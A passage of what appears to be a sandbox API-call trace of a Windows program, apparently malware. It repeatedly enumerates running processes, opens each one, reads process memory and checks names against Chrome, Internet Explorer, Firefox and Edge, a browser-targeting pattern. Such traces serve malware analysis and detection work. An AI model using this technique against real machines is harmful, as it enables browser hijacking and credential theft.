	[0239.834] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.834] NtQueryInformationProcess (in: ProcessHandle=0x815c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0239.834] ReadProcessMemory (in: hProcess=0x815c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0239.834] ReadProcessMemory (in: hProcess=0x815c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0239.834] ReadProcessMemory (in: hProcess=0x815c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0239.834] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0239.834] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0239.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8160
	[0239.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.835] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0239.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.836] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.836] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0239.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.836] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0239.837] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8164
	[0239.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.838] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0239.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.838] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.838] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0239.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.839] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.839] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.840] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8168
	[0239.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.840] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.840] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.841] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.841] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.841] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.842] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.843] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x816c
	[0239.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.843] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.843] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.844] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.844] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.844] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.845] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8170
	[0239.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.845] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.845] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.846] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.846] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.846] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0239.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8174
	[0239.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.847] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0239.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.848] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.848] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0239.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.848] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.849] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8178
	[0239.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.850] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.850] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.850] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.851] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.851] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.852] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x817c
	[0239.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.852] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.852] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.853] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.853] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.853] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0239.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8180
	[0239.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.854] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0239.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.854] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.855] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0239.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.855] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.855] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0239.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8184
	[0239.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.856] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.856] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.857] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.857] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.857] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0239.858] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8188
	[0239.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.858] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0239.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.858] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.859] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0239.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.859] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.859] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0239.860] CloseHandle (hObject=0x4fd0) returned 1
	[0239.860] Sleep (dwMilliseconds=0x64) 
	[0239.991] GetCurrentProcessId () returned 0x110
	[0239.991] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0239.994] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0239.995] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0239.995] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0239.996] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x818c
	[0239.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.996] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0239.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.997] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.997] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0239.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.997] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.998] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0239.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8190
	[0239.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.998] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0239.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.999] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.999] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0239.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.999] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.000] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0240.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8194
	[0240.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.001] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0240.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.001] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.002] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0240.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.002] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.002] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0240.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8198
	[0240.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.003] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.004] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.004] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.004] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.004] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0240.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x819c
	[0240.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.005] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0240.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.006] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.006] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0240.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.007] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.007] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0240.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x81a0
	[0240.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.008] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0240.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.008] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.009] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0240.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.009] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0240.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x81a4
	[0240.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.010] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0240.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.011] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.011] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0240.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.011] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.011] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0240.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x81a8
	[0240.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.012] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0240.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.012] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.013] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0240.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.013] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.013] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x81ac
	[0240.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.014] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.015] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.015] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.015] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x81b0
	[0240.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.016] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.017] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.017] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.017] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x81b4
	[0240.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.019] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.019] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.019] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.020] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x81b8
	[0240.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.021] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
